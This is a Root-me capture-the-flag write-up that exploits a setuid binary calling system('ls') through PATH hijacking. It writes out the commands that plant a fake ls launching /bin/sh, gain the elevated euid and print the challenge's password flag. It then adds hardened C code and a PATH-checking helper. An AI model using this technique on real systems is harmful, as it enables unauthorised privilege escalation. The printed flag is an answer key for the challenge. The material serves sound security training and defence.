Root-me.org

Bash - System 2

Simple Script

Once again we need to get the content of .passwd. This time the script uses ls with some options.

/* ch12: a setuid binary that calls system(), so "ls" is resolved through the caller's PATH */
#include <stdlib.h>

int main(){
	system("ls -lA /challenge/app-script/ch12/.passwd");
	return 0;
}

We can’t reuse the previous method because of the options, so this time we’ll use /bin/sh to get a new shell running with the id of app-script-ch12-cracked.

We’ll be creating an executable command called ls that contains /bin/sh. We’re using /bin/sh because, unlike bash, it doesn’t drop the elevated effective uid when it differs from the real uid.

Since the setuid bit is set on ch12, that shell runs as the user owning the binary, app-script-ch12-cracked:

-r-sr-x---  1 app-script-ch12-cracked app-script-ch12         7.0K Aug 11  2015 ch12

So we’ll create a new folder, put our fake ls in it, and prepend the folder to our PATH.

mkdir -p /tmp/mine
echo "/bin/sh;" > /tmp/mine/ls
chmod +x /tmp/mine/ls
export PATH=/tmp/mine:$PATH

./ch12

id
uid=1312(app-script-ch12) gid=1312(app-script-ch12) euid=1409(app-script-ch12-cracked) groups=1409(app-script-ch12-cracked),100(users),1312(app-script-ch12)

cat .passwd
8a95eDS/*e_T#
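As an added example, not part of the original write-up or of the challenge code: the same listing done without a shell, with an absolute path to the binary and a fixed environment, so a PATH entry such as /tmp/mine can no longer redirect the lookup of ls. The helper name path_is_suspicious is an assumption; it flags PATH entries an unprivileged user could populate.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
/* Hardened replacement for system("ls -lA <file>"): no shell, absolute path,
 * explicit argv and a fixed PATH, so nothing the caller exported (such as
 * /tmp/mine) takes part in resolving "ls". Returns ls's exit status or -1. */
int list_file_hardened(const char *file)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "ls", "-lA", (char *)file, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve("/bin/ls", argv, envp);
        _exit(127); /* only reached if execve itself failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Assumed helper (not from the challenge): returns 1 if PATH has an entry an
 * unprivileged user could populate with a fake ls (relative or empty entry,
 * or anything under /tmp), 0 if every entry is an absolute non-/tmp dir. */
int path_is_suspicious(const char *path)
{
    if (path == NULL || *path == '\0') return 1;
    /* strtok_r skips empty fields, which sh resolves as the current dir */
    if (path[0] == ':' || path[strlen(path) - 1] == ':' || strstr(path, "::"))
        return 1;
    char *copy = strdup(path), *save = NULL;
    if (copy == NULL) return 1;
    int bad = 0;
    for (char *e = strtok_r(copy, ":", &save); e; e = strtok_r(NULL, ":", &save))
        if (e[0] != '/' || strcmp(e, "/tmp") == 0 || strncmp(e, "/tmp/", 5) == 0)
            bad = 1;
    free(copy);
    return bad;
}

int main(void)
{
    /* Constructed sample: the PATH exported in the write-up above. */
    printf("PATH suspicious: %d\n", path_is_suspicious("/tmp/mine:/usr/bin:/bin"));
    return list_file_hardened("/");
}
```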